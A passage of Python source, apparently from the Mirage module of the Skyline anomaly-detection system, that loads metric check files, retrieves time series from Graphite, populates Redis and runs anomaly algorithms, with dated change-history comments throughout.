graphite_until = datetime.datetime.fromtimestamp(int(float(time_now))).strftime('%H:%M_%Y%m%d')
graphite_from = datetime.datetime.fromtimestamp(int(time_from)).strftime('%H:%M_%Y%m%d')
# Remove any old json file related to the metric
metric_data_folder = '%s/%s' % (settings.MIRAGE_DATA_FOLDER, metric)
metric_json_file = '%s/%s.json' % (metric_data_folder, str(metric))
try:
os.remove(metric_json_file)
except OSError:
pass
# Get data from graphite
logger.info('populate_redis :: surfacing %s time series from Graphite' % (metric))
try:
self.surface_graphite_metric_data(metric, graphite_from, graphite_until)
except:
logger.error(traceback.format_exc())
logger.error('error :: populate_redis :: failed to surface_graphite_metric_data to populate %s' % (
str(metric_json_file)))
# Check there is a json timeseries file to use
if not os.path.isfile(metric_json_file):
logger.error(
'error :: populate_redis :: retrieve failed - failed to surface %s time series from graphite' % (
metric))
try:
self.redis_conn.setex(redis_populated_key, settings.FULL_DURATION, time_now)
logger.info('populate_redis :: created Redis key %s' % (redis_populated_key))
except:
logger.error(traceback.format_exc())
logger.error('error :: populate_redis :: failed to create Redis key %s' % redis_populated_key)
try:
self.redis_conn.srem('mirage.populate_redis', metric)
logger.info('populate_redis :: removed item - %s - from Redis set mirage.populate_redis' % (metric))
except:
logger.error(traceback.format_exc())
logger.error('error :: populate_redis :: failed to remove item %s from Redis set mirage.populate_redis' % metric)
return
else:
logger.info('populate_redis :: retrieved data :: for %s' % (
metric))
self.check_if_parent_is_alive()
timeseries = []
try:
with open((metric_json_file), 'r') as f:
timeseries = json.loads(f.read())
except:
logger.error(traceback.format_exc())
logger.error('error :: populate_redis :: failed to get timeseries from json - %s' % metric_json_file)
timeseries = []
if not timeseries:
logger.info('populate_redis :: no timeseries data for %s, setting redis_populated_key and removing from mirage.populate_redis' % metric)
try:
self.redis_conn.setex(redis_populated_key, settings.FULL_DURATION, time_now)
logger.info('populate_redis :: created Redis key %s' % (redis_populated_key))
except:
logger.error(traceback.format_exc())
logger.error('error :: populate_redis :: failed to create Redis key %s' % redis_populated_key)
try:
self.redis_conn.srem('mirage.populate_redis', metric)
logger.info('populate_redis :: removed item - %s - from Redis set mirage.populate_redis' % (metric))
except:
logger.error(traceback.format_exc())
logger.error('error :: populate_redis :: failed to remove item %s from Redis set mirage.populate_redis' % metric)
return
try:
os.remove(metric_json_file)
except OSError:
pass
FULL_NAMESPACE = settings.FULL_NAMESPACE
pipe = None
logger.info('populate_redis :: time series data for %s, populating Redis with %s data points' % (
metric, str(len(timeseries))))
try:
pipe = self.redis_conn.pipeline()
except Exception as e:
logger.error('error :: populate_redis :: error on Redis pipe: %s' % (str(e)))
pipe = None
redis_populated = False
try:
for metric_data in timeseries:
key = ''.join((FULL_NAMESPACE, metric))
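# e.g. with a FULL_NAMESPACE of 'metrics.' and a metric named
# 'stats.cpu.user' (both illustrative) the Redis key is
# 'metrics.stats.cpu.user', to which each msgpack-packed datapoint
# is appended below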
try:
pipe.append(str(key), packb(metric_data))
except Exception as e:
logger.error('error :: populate_redis :: error on pipe.append: %s' % (str(e)))
pipe.execute()
redis_populated = True
except Exception as e:
logger.error('error :: populate_redis :: error on pipe.execute: %s' % (str(e)))
if redis_populated:
del timeseries
try:
self.redis_conn.setex(redis_populated_key, settings.FULL_DURATION, time_now)
logger.info('populate_redis :: created Redis key %s' % (redis_populated_key))
except:
logger.error(traceback.format_exc())
logger.error('error :: populate_redis :: failed to create Redis key %s' % redis_populated_key)
# Add to Redis set so that Analyzer sorts and deduplicates the data
# on the next run
try:
self.redis_conn.sadd('mirage.filled', metric)
logger.info('populate_redis :: add %s to Redis set mirage.filled for Analyzer to sort and deduplicate the Redis data' % metric)
except Exception as e:
logger.error('error :: populate_redis :: failed add metric to Redis set mirage.filled: %s' % e)
try:
self.redis_conn.setex(redis_populated_key, settings.FULL_DURATION, time_now)
logger.info('populate_redis :: created Redis key %s' % (redis_populated_key))
except:
logger.error(traceback.format_exc())
logger.error('error :: populate_redis :: failed to create Redis key %s' % redis_populated_key)
try:
self.redis_conn.srem('mirage.populate_redis', metric)
logger.info('populate_redis :: removed item - %s - from Redis set mirage.populate_redis' % (metric))
except:
logger.error(traceback.format_exc())
logger.error('error :: populate_redis :: failed to remove item %s from Redis set mirage.populate_redis' % metric)
return
# @modified 20200909 - Task #3730: Validate Mirage running multiple processes
# def spin_process(self, i, run_timestamp):
def spin_process(self, i, run_timestamp, metric_check_filename):
"""
Assign a metric for a process to analyze.
"""
# if int(i) > 1:
# i_less_one = int(i) - 1
# sleep_for_str = '0.%s' % str(i_less_one)
# logger.info('process %s sleeping for %s' % (str(i), sleep_for_str))
# sleep(float(sleep_for_str))
# Discover metric to analyze
# metric_var_files = [f for f in listdir(settings.MIRAGE_CHECK_PATH) if isfile(join(settings.MIRAGE_CHECK_PATH, f))]
# Check if this process is unnecessary
# if len(metric_var_files) == 0:
# logger.info('no check files found, nothing to do')
# return
# metric_var_files_sorted = sorted(metric_var_files)
# @added 20200903 - Task #3730: Validate Mirage running multiple processes
# Ensure the process locks the check
# metric_check_filename = None
# for i_metric_check_file in metric_var_files_sorted:
# check_assigned = False
# cache_key = 'mirage.check.lock.%s' % str(i_metric_check_file)
# try:
# check_assigned = self.redis_conn.get(cache_key)
# if not check_assigned:
# try:
# self.redis_conn.setex(cache_key, 120, int(time()))
# metric_check_filename = str(i_metric_check_file)
# logger.info('assigned self check file and set Redis key - %s' % (cache_key))
# self.redis_conn.sadd('mirage.checks.done', metric_check_filename)
# break
# except:
# logger.error(traceback.format_exc())
# logger.error('error :: failed to set Redis key - %s' % cache_key)
# else:
# logger.info('already assigned, Redis key exists - %s' % (cache_key))
#
# except:
# logger.error(traceback.format_exc())
# logger.error('error :: failed to check if Redis key exists - %s' % cache_key)
if not metric_check_filename:
logger.info('no check to assign to process, nothing to do')
return
metric_check_file = '%s/%s' % (
# @modified 20200903 - Task #3730: Validate Mirage running multiple processes
# settings.MIRAGE_CHECK_PATH, str(metric_var_files_sorted[0]))
settings.MIRAGE_CHECK_PATH, metric_check_filename)
check_file_name = os.path.basename(str(metric_check_file))
check_file_timestamp = check_file_name.split('.', 1)[0]
check_file_metricname_txt = check_file_name.split('.', 1)[1]
check_file_metricname = check_file_metricname_txt.replace('.txt', '')
check_file_metricname_dir = check_file_metricname.replace('.', '/')
metric_failed_check_dir = '%s/%s/%s' % (failed_checks_dir, check_file_metricname_dir, check_file_timestamp)
# Load metric variables
# @modified 20160822 - Bug #1460: panorama check file fails
# Changed to panorama style skyline_functions load_metric_vars
# self.load_metric_vars(metric_check_file)
# Load and validate metric variables
try:
# @modified 20170127 - Feature #1886: Ionosphere learn - child like parent with evolutionary maturity
# Bug #1460: panorama check file fails
# Panorama check file fails #24
# Get rid of the skyline_functions imp as imp is deprecated in py3 anyway
# metric_vars = load_metric_vars(skyline_app, str(metric_check_file))
metric_vars_array = self.mirage_load_metric_vars(str(metric_check_file))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to load metric variables from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
# Test metric variables
# if len(metric_vars.metric) == 0:
# logger.error('error :: failed to load metric variable from check file - %s' % (metric_check_file))
# return
# else:
# metric = metric_vars.metric
# metric_name = ['metric_name', metric_vars.metric]
# self.metric_variables.append(metric_name)
# logger.info('debug :: added metric_name %s from check file - %s' % (metric_name, metric_check_file))
metric = None
# @added 20200106 - Branch #3262: py3
# Task #3034: Reduce multiprocessing Manager list usage
# @modified 20200903 - Task #3730: Validate Mirage running multiple processes
# redis_set_to_delete = 'mirage.metric_variables'
redis_metric_variables_set = 'mirage.%s.metric_variables' % str(i)
redis_set_to_delete = redis_metric_variables_set
try:
self.redis_conn.delete(redis_set_to_delete)
logger.info('deleted Redis set - %s' % redis_set_to_delete)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to delete Redis set - %s' % redis_set_to_delete)
try:
key = 'metric'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
metric = str(value_list[0])
metric_name = ['metric_name', metric]
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# self.metric_variables.append(metric_name)
# @modified 20200903 - Task #3730: Validate Mirage running multiple processes
redis_set = 'mirage.metric_variables'
data = str(metric_name)
try:
# @modified 20200903 - Task #3730: Validate Mirage running multiple processes
# self.redis_conn.sadd(redis_set, data)
self.redis_conn.sadd(redis_metric_variables_set, data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
logger.info('debug :: added metric_name %s from check file - %s' % (str(metric_name), metric_check_file))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to read metric variable from check file - %s' % (metric_check_file))
return
if not metric:
logger.error('error :: failed to load metric variable from check file - %s' % (metric_check_file))
return
# if len(metric_vars.value) == 0:
# return
# else:
# metric_value = ['metric_value', metric_vars.value]
# self.metric_variables.append(metric_value)
value = None
try:
key = 'value'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
value = float(value_list[0])
metric_value = ['metric_value', value]
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# self.metric_variables.append(metric_value)
redis_set = 'mirage.metric_variables'
data = str(metric_value)
try:
# @modified 20200903 - Task #3730: Validate Mirage running multiple processes
# self.redis_conn.sadd(redis_set, data)
self.redis_conn.sadd(redis_metric_variables_set, data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
except:
logger.error('error :: failed to read value variable from check file - %s' % (metric_check_file))
return
if not value:
# @modified 20181119 - Bug #2708: Failing to load metric vars
if value == 0.0:
pass
else:
logger.error('error :: failed to load value variable from check file - %s' % (metric_check_file))
return
# if len(metric_vars.hours_to_resolve) == 0:
# return
# else:
# hours_to_resolve = ['hours_to_resolve', metric_vars.hours_to_resolve]
# self.metric_variables.append(hours_to_resolve)
hours_to_resolve = None
try:
key = 'hours_to_resolve'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
hours_to_resolve = int(value_list[0])
hours_to_resolve_list = ['hours_to_resolve', hours_to_resolve]
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# self.metric_variables.append(hours_to_resolve_list)
redis_set = 'mirage.metric_variables'
data = str(hours_to_resolve_list)
try:
# @modified 20200903 - Task #3730: Validate Mirage running multiple processes
# self.redis_conn.sadd(redis_set, data)
self.redis_conn.sadd(redis_metric_variables_set, data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
except:
logger.error('error :: failed to read hours_to_resolve variable from check file - %s' % (metric_check_file))
return
if not hours_to_resolve:
logger.error('error :: failed to load hours_to_resolve variable from check file - %s' % (metric_check_file))
return
# if len(metric_vars.metric_timestamp) == 0:
# return
# else:
# metric_timestamp = ['metric_timestamp', metric_vars.metric_timestamp]
# self.metric_variables.append(metric_timestamp)
metric_timestamp = None
try:
key = 'metric_timestamp'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
metric_timestamp = int(value_list[0])
metric_timestamp_list = ['metric_timestamp', metric_timestamp]
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# self.metric_variables.append(metric_timestamp_list)
redis_set = 'mirage.metric_variables'
data = str(metric_timestamp_list)
try:
# @modified 20200903 - Task #3730: Validate Mirage running multiple processes
# self.redis_conn.sadd(redis_set, data)
self.redis_conn.sadd(redis_metric_variables_set, data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
except:
logger.error('error :: failed to read metric_timestamp variable from check file - %s' % (metric_check_file))
return
if not metric_timestamp:
logger.error('error :: failed to load metric_timestamp variable from check file - %s' % (metric_check_file))
return
# @added 20200916 - Branch #3068: SNAB
# Task #3744: POC matrixprofile
snab_only_check = None
try:
key = 'snab_only_check'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
snab_only_check = value_list[0]
except:
snab_only_check = None
snab_only_check_list = ['snab_only_check', snab_only_check]
redis_set = 'mirage.metric_variables'
data = str(snab_only_check_list)
try:
self.redis_conn.sadd(redis_metric_variables_set, data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# @added 20210304 - Feature #3642: Anomaly type classification
# Feature #3970: custom_algorithm - adtk_level_shift
# Added triggered_algorithms to mirage_check_file
try:
key = 'triggered_algorithms'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
triggered_algorithms = value_list[0]
except:
triggered_algorithms = []
metric_data_dir = '%s/%s' % (settings.MIRAGE_DATA_FOLDER, str(metric))
# Ignore any metric check with a timestamp greater than MIRAGE_STALE_SECONDS
int_metric_timestamp = int(metric_timestamp)
int_run_timestamp = int(run_timestamp)
metric_timestamp_age = int_run_timestamp - int_metric_timestamp
periodic_mirage_check = False
if MIRAGE_PERIODIC_CHECK:
try:
mirage_periodic_check_metrics = list(self.redis_conn_decoded.smembers('mirage.periodic_check.metrics'))
except:
logger.error('error :: failed to get mirage_periodic_check_metrics from Redis')
mirage_periodic_check_metrics = []
redis_metric_name = '%s%s' % (settings.FULL_NAMESPACE, str(metric))
if redis_metric_name in mirage_periodic_check_metrics:
logger.info('this is a periodic Mirage check for %s' % metric)
periodic_mirage_check = True
# @added 20200413 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Do not evaluate batch metrics against MIRAGE_STALE_SECONDS
if BATCH_PROCESSING:
# Is this an analyzer_batch related anomaly
analyzer_batch_anomaly = None
analyzer_batch_metric_anomaly_key = 'analyzer_batch.anomaly.%s.%s' % (
str(metric_timestamp), metric)
try:
# analyzer_batch_anomaly = self.redis_conn.get(analyzer_batch_metric_anomaly_key)
analyzer_batch_anomaly = self.redis_conn_decoded.get(analyzer_batch_metric_anomaly_key)
except Exception as e:
logger.error(
'error :: could not query cache_key - %s - %s' % (
analyzer_batch_metric_anomaly_key, e))
analyzer_batch_anomaly = None
if analyzer_batch_anomaly:
logger.info('batch processing - identified as an analyzer_batch triggered anomaly from the presence of the Redis key %s' % analyzer_batch_metric_anomaly_key)
else:
logger.info('batch processing - not identified as an analyzer_batch triggered anomaly as no Redis key found - %s' % analyzer_batch_metric_anomaly_key)
if analyzer_batch_anomaly:
logger.info('batch processing - setting metric_timestamp_age from %s to 1 so that it will not be discarded as stale on %s' % (
str(metric_timestamp_age), metric))
metric_timestamp_age = 1
if metric_timestamp_age > settings.MIRAGE_STALE_SECONDS:
logger.info('stale check :: %s check request is %s seconds old - discarding' % (metric, str(metric_timestamp_age)))
# Remove metric check file
# try:
# os.remove(metric_check_file)
# except OSError:
# pass
# return
if os.path.isfile(metric_check_file):
os.remove(metric_check_file)
logger.info('removed check file - %s' % (metric_check_file))
else:
logger.info('could not remove check file - %s' % (metric_check_file))
# Remove the metric directory
if os.path.exists(metric_data_dir):
try:
rmtree(metric_data_dir)
logger.info('removed data dir - %s' % metric_data_dir)
except:
logger.error('error :: failed to rmtree - %s' % metric_data_dir)
# @added 20200903 - Task #3730: Validate Mirage running multiple processes
redis_set = 'mirage.stale_check_discarded'
try:
self.redis_conn.sadd(redis_set, str(metric))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(metric), str(redis_set)))
return
# Calculate hours second order resolution to seconds
second_order_resolution_seconds = int(hours_to_resolve) * 3600
# Calculate graphite from and until parameters from the metric timestamp
graphite_until = datetime.datetime.fromtimestamp(int(float(metric_timestamp))).strftime('%H:%M_%Y%m%d')
int_second_order_resolution_seconds = int(float(second_order_resolution_seconds))
second_resolution_timestamp = int_metric_timestamp - int_second_order_resolution_seconds
graphite_from = datetime.datetime.fromtimestamp(int(second_resolution_timestamp)).strftime('%H:%M_%Y%m%d')
# Remove any old json file related to the metric
metric_json_file = '%s/%s.json' % (metric_data_dir, str(metric))
try:
os.remove(metric_json_file)
except OSError:
pass
# Get data from graphite
logger.info(
'retrieve data :: surfacing %s time series from graphite for %s seconds' % (
metric, str(second_order_resolution_seconds)))
# @modified 20191113 - Branch #3262: py3
# Wrapped in try
try:
self.surface_graphite_metric_data(metric, graphite_from, graphite_until)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to surface_graphite_metric_data to populate %s' % (
str(metric_json_file)))
# Check there is a json timeseries file to test
if not os.path.isfile(metric_json_file):
logger.error(
'error :: retrieve failed - failed to surface %s time series from graphite' % (
metric))
# @added 20200905 - Feature #3734: waterfall alerts
# Try a metric 3 times before removing the check file
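# The fail count is held in a Redis key with a 300 second TTL so the
# check is retried on subsequent runs before the check file is removed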
remove_check_file = True
check_failed_key = 'mirage.check.data_retrieval_failed.%s.%s' % (
str(int_metric_timestamp), metric)
fail_count = 0
try:
# Cast the Redis value to an int so the fail count can be incremented
fail_count = int(self.redis_conn.get(check_failed_key))
except:
fail_count = 0
if not fail_count:
fail_count = 0
fail_count += 1
if fail_count < 3:
remove_check_file = False
try:
self.redis_conn.setex(check_failed_key, 300, fail_count)
logger.info('updated fail_count to %s in %s' % (str(fail_count), check_failed_key))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to set Redis key %s with %s' % (
str(check_failed_key), str(fail_count)))
else:
logger.error('error :: fail_count is %s in %s, removing check file' % (str(fail_count), check_failed_key))
if remove_check_file:
# Remove metric check file
try:
os.remove(metric_check_file)
except OSError:
pass
# Remove the metric directory
try:
rmtree(metric_data_dir)
logger.info('removed data dir - %s' % metric_data_dir)
except:
logger.error('error :: failed to rmtree %s' % metric_data_dir)
return
else:
logger.info('retrieved data :: for %s at %s seconds' % (
metric, str(second_order_resolution_seconds)))
####
# @added 20201208 - Feature #3866: MIRAGE_ENABLE_HIGH_RESOLUTION_ANALYSIS
# Task #3868: POC MIRAGE_ENABLE_HIGH_RESOLUTION_ANALYSIS
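# When enabled, a second high resolution timeseries is surfaced from
# Graphite and, if it is available, it is used for the analysis in
# place of the full second order resolution timeseries, which is
# restored after the analysis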
use_high_res_file = False
if MIRAGE_ENABLE_HIGH_RESOLUTION_ANALYSIS:
high_resolution_seconds = int_second_order_resolution_seconds - 3600
high_resolution_timestamp = int_metric_timestamp - high_resolution_seconds
graphite_from = datetime.datetime.fromtimestamp(high_resolution_timestamp).strftime('%H:%M_%Y%m%d')
# Remove any old file related to the metric
metric_high_res_file = '%s/%s.high_res' % (metric_data_dir, str(metric))
try:
os.remove(metric_high_res_file)
except OSError:
pass
# Get data from graphite
logger.info(
'retrieve data :: surfacing high resolution %s time series from graphite for %s seconds' % (
metric, str(high_resolution_seconds)))
try:
high_res = True
self.surface_graphite_metric_data(metric, graphite_from, graphite_until, high_res)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to surface_graphite_metric_data to populate %s' % (
str(metric_high_res_file)))
# Check there is a json high_res timeseries file to test
if not os.path.isfile(metric_high_res_file):
logger.error(
'error :: retrieve failed - failed to surface high resolution %s time series from graphite' % (
metric))
else:
logger.info('retrieved data :: for %s at %s seconds' % (
metric, str(high_resolution_seconds)))
use_high_res_file = metric_high_res_file
####
# Make process-specific dicts
exceptions = defaultdict(int)
anomaly_breakdown = defaultdict(int)
self.check_if_parent_is_alive()
with open((metric_json_file), 'r') as f:
timeseries = json.loads(f.read())
logger.info('data points surfaced :: %s' % (str(len(timeseries))))
# @added 20201208 - Feature #3866: MIRAGE_ENABLE_HIGH_RESOLUTION_ANALYSIS
# Task #3868: POC MIRAGE_ENABLE_HIGH_RESOLUTION_ANALYSIS
high_resolution_analysis = False
if use_high_res_file:
high_resolution_timeseries = []
try:
with open((use_high_res_file), 'r') as f:
high_resolution_timeseries = json.loads(f.read())
logger.info('high resolution data points surfaced :: %s' % (str(len(high_resolution_timeseries))))
except Exception as e:
logger.error('error :: could not create high_resolution_timeseries from %s - %s' % (
str(use_high_res_file), str(e)))
if high_resolution_timeseries:
low_resolution_timeseries = list(timeseries)
logger.info('overriding timeseries with high_resolution_timeseries for analysis')
timeseries = high_resolution_timeseries
second_order_low_resolution_seconds = int(second_order_resolution_seconds)
second_order_resolution_seconds = int(high_resolution_seconds)
high_resolution_analysis = True
# @added 20170212 - Feature #1886: Ionosphere learn
# Only process if the metric has sufficient data
first_timestamp = None
try:
first_timestamp = int(timeseries[0][0])
except:
logger.error('error :: could not determine first timestamp')
timestamp_now = int(time())
valid_if_before_timestamp = timestamp_now - int(settings.FULL_DURATION)
valid_mirage_timeseries = True
if first_timestamp:
if first_timestamp > valid_if_before_timestamp:
valid_mirage_timeseries = False
# @added 20170603 - Feature #2034: analyse_derivatives
# Convert the values of metrics strictly increasing monotonically
# to their derivative products
known_derivative_metric = False
try:
# @modified 20191022 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# derivative_metrics = list(self.redis_conn.smembers('derivative_metrics'))
derivative_metrics = list(self.redis_conn_decoded.smembers('derivative_metrics'))
except:
derivative_metrics = []
redis_metric_name = '%s%s' % (settings.FULL_NAMESPACE, str(metric))
if redis_metric_name in derivative_metrics:
known_derivative_metric = True
if known_derivative_metric:
try:
# @modified 20200606 - Bug #3572: Apply list to settings import
non_derivative_monotonic_metrics = list(settings.NON_DERIVATIVE_MONOTONIC_METRICS)
except:
non_derivative_monotonic_metrics = []
skip_derivative = in_list(redis_metric_name, non_derivative_monotonic_metrics)
if skip_derivative:
known_derivative_metric = False
if known_derivative_metric and valid_mirage_timeseries:
try:
derivative_timeseries = nonNegativeDerivative(timeseries)
timeseries = derivative_timeseries
except:
logger.error('error :: nonNegativeDerivative failed')
# @added 20200916 - Branch #3068: SNAB
# Task #3744: POC matrixprofile
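# For a snab_only_check the surfaced timeseries is written to a SNAB
# json file and the check details are added to the
# mirage_snab_only_checks_redis_set Redis set, the check file and data
# dir are then removed and the check returns without further analysis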
if snab_only_check:
snab_recheck_key = 'snab.recheck.%s' % metric
snab_recheck_key_exists = False
try:
snab_recheck_key_exists = self.redis_conn_decoded.get(snab_recheck_key)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get Redis key %s' % (
snab_recheck_key))
original_added_at = 0
if snab_recheck_key_exists:
logger.info('snab recheck key exists - %s' % snab_recheck_key)
try:
original_added_at = int(snab_recheck_key_exists)
except:
# The key expired
original_added_at = int(time()) - 300
else:
logger.info('snab recheck key does not exist - %s' % snab_recheck_key)
snab_recheck_original_anomaly_timestamp_key = 'snab.recheck.anomaly_timestamp.%s' % metric
snab_recheck_original_anomaly_timestamp_key_exists = False
try:
snab_recheck_original_anomaly_timestamp_key_exists = self.redis_conn_decoded.get(snab_recheck_original_anomaly_timestamp_key)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get Redis key %s' % (
snab_recheck_original_anomaly_timestamp_key))
original_anomaly_timestamp = int(timeseries[-1][0])
if snab_recheck_original_anomaly_timestamp_key_exists:
logger.info('snab.recheck.anomaly_timestamp key exists - %s' % snab_recheck_original_anomaly_timestamp_key)
try:
original_anomaly_timestamp = int(snab_recheck_original_anomaly_timestamp_key_exists)
except:
# The key expired
pass
else:
logger.info('snab.recheck.anomaly_timestamp key does not exist - %s' % snab_recheck_original_anomaly_timestamp_key)
snab_json_file_created = False
if snab_recheck_key_exists and snab_recheck_original_anomaly_timestamp_key_exists:
# Create timeseries json file with the timeseries
use_snab_timestamp = metric_timestamp
try:
use_snab_timestamp = int(timeseries[-1][0])
except:
pass
snab_json_file = '%s/%s.%s.json' % (
# settings.SNAB_DATA_DIR, str(int(metric_timestamp)), str(metric))
settings.SNAB_DATA_DIR, str(int(use_snab_timestamp)), str(metric))
timeseries_json = str(timeseries).replace('[', '(').replace(']', ')')
try:
snab_data_last_datapoint = [timeseries[-1][0], timeseries[-1][1]]
except:
snab_data_last_datapoint = [None, None, 'there was no timeseries data']
if timeseries_json:
try:
write_data_to_file(skyline_app, snab_json_file, 'w', timeseries_json)
logger.info('added snab timeseries file with last entry - %s :: %s' % (
str(snab_data_last_datapoint), snab_json_file))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed to add snab timeseries file :: %s' %
snab_json_file)
if not os.path.isfile(snab_json_file):
logger.error('error - the snab_json_file was not created - %s' % (
str(snab_json_file)))
else:
logger.info('snab_json_file exists - %s' % snab_json_file)
snab_json_file_created = True
else:
logger.error(
'error :: no timeseries_json to add snab timeseries file :: %s' %
snab_json_file)
else:
logger.info('not adding snab_json_file as the snab recheck keys no longer exist')
if snab_json_file_created:
data = {
'metric': metric,
'anomaly_data': snab_json_file,
'timestamp': int(timeseries[-1][0]),
'original_anomaly_timestamp': original_anomaly_timestamp,
'value': timeseries[-1][1],
'original_added_at': original_added_at,
}
try:
self.redis_conn.sadd(mirage_snab_only_checks_redis_set, str(data))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to %s Redis set' % (
metric, str(mirage_snab_only_checks_redis_set)))
# Remove metric check file
try:
os.remove(metric_check_file)
except OSError:
pass
# Remove the metric directory
try:
rmtree(metric_data_dir)
logger.info('removed data dir for snab_check_only - %s' % metric_data_dir)
except:
logger.error('error :: failed to rmtree for snab_check_only - %s' % metric_data_dir)
return
# @added 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Determine if any metrics have negative values so that they can be
# added to the ionosphere.untrainable_metrics Redis set
run_negatives_present = False
if settings.IONOSPHERE_ENABLED and valid_mirage_timeseries:
run_negatives_present = True
known_negative_metric_matched_by = None
known_negative_metric, known_negative_metric_matched_by = matched_or_regexed_in_list(skyline_app, metric, KNOWN_NEGATIVE_METRICS)
if known_negative_metric:
run_negatives_present = False
logger.info('will not check %s for negative values' % (metric))
else:
logger.info('will check %s for negative values' % (metric))
# @added 20201001 - Branch #3068: SNAB
# Task #3748: POC SNAB
# Add timings
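# Determine whether the metric matches a namespace declared in
# SNAB_CHECKS for this app so that the analysis run time can be
# recorded in a Redis key for SNAB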
snab_check_namespace = False
if SNAB_ENABLED and SNAB_CHECKS:
for app in SNAB_CHECKS:
if app == skyline_app:
for snab_context in SNAB_CHECKS[app]:
if snab_check_namespace:
break
for algorithm in SNAB_CHECKS[app][snab_context]:
if snab_check_namespace:
break
try:
for namespace in SNAB_CHECKS[app][snab_context][algorithm]['namespaces']:
if namespace in redis_metric_name:
snab_check_namespace = True
break
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to check if %s is a snab_check_metric' % redis_metric_name)
# @added 20200607 - Feature #3566: custom_algorithms
algorithms_run = list(settings.MIRAGE_ALGORITHMS)
# @added 20200904 - Feature #3734: waterfall alerts
anomalous = None
# @added 20201001 - Branch #3068: SNAB
# Task #3748: POC SNAB
# Add timings
analysis_start_time = time()
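# Analyse the timeseries with run_selected_algorithm, but only if the
# timeseries spans sufficient history (valid_mirage_timeseries),
# otherwise the metric is handled as not anomalous using the last
# datapoint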
try:
if valid_mirage_timeseries:
logger.info('analyzing :: %s at %s seconds' % (metric, second_order_resolution_seconds))
# @modified 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Added run_negatives_present and negatives_found
# anomalous, ensemble, datapoint = run_selected_algorithm(timeseries, metric, second_order_resolution_seconds)
# @modified 20200607 - Feature #3566: custom_algorithms
# Added algorithms_run
# @modified 20210304 - Feature #3642: Anomaly type classification
# Feature #3970: custom_algorithm - adtk_level_shift
# Added triggered_algorithms
anomalous, ensemble, datapoint, negatives_found, algorithms_run = run_selected_algorithm(timeseries, metric, second_order_resolution_seconds, run_negatives_present, triggered_algorithms)
else:
logger.info('not analyzing :: %s at %s seconds as there are not sufficiently old datapoints in the timeseries - not valid_mirage_timeseries' % (metric, second_order_resolution_seconds))
anomalous = False
datapoint = timeseries[-1][1]
# It could have been deleted by the Roomba
except TypeError:
# @added 20200430 - Feature #3480: batch_processing
# Added logging here as the DeletedByRoomba exception is
# generally not related to that, but to some other failure
# in the processing of the run algorithms phase.
# It could have been deleted by the Roomba, but Mirage does not use
# Redis data so probably, definitely was not :)
logger.error(traceback.format_exc())
logger.error('error :: added as DeletedByRoomba but possibly not, see traceback above')
exceptions['DeletedByRoomba'] += 1
logger.info('exceptions :: DeletedByRoomba')
except TooShort:
exceptions['TooShort'] += 1
logger.info('exceptions :: TooShort')
except Stale:
exceptions['Stale'] += 1
logger.info('exceptions :: Stale')
except Boring:
exceptions['Boring'] += 1
logger.info('exceptions :: Boring')
except:
exceptions['Other'] += 1
logger.info('exceptions :: Other')
logger.error(traceback.format_exc())
# @added 20201001 - Branch #3068: SNAB
# Task #3748: POC SNAB
# Add timings
analysis_run_time = time() - analysis_start_time
logger.info('algorithms analysis completed in %.2f seconds' % (
analysis_run_time))
# @modified 20200728 - Bug #3652: Handle multiple metrics in base_name conversion
# base_name = metric.replace(settings.FULL_NAMESPACE, '', 1)
if metric.startswith(settings.FULL_NAMESPACE):
base_name = metric.replace(settings.FULL_NAMESPACE, '', 1)
else:
base_name = metric
# @added 20210505 - Bug #4048: Mirage - removing feedback metrics to be processed
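# If the metric was flagged as a feedback metric when it was checked,
# set a mirage.feedback_metric.processed key with a 600 second TTL so
# that the run loop knows the metric was recently processed and can
# discard further feedback metric checks while Mirage is busy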
feedback_cache_key_exists = False
feedback_cache_key = 'mirage.feedback_metric.checked.%s' % (base_name)
try:
feedback_cache_key_exists = self.redis_conn_decoded.get(feedback_cache_key)
except Exception as e:
logger.error('error :: failed to get %s key from Redis - %s' % (
str(feedback_cache_key), e))
if feedback_cache_key_exists:
feedback_processed_cache_key = 'mirage.feedback_metric.processed.%s' % (base_name)
logger.info('feedback metric processed adding Redis key with 600 TTL - %s' % feedback_processed_cache_key)
try:
self.redis_conn.setex(feedback_processed_cache_key, 600, int(analysis_start_time))
except Exception as e:
logger.error('error :: failed to add %s key to Redis - %s' % (
str(feedback_processed_cache_key), e))
# @added 20201208 - Feature #3866: MIRAGE_ENABLE_HIGH_RESOLUTION_ANALYSIS
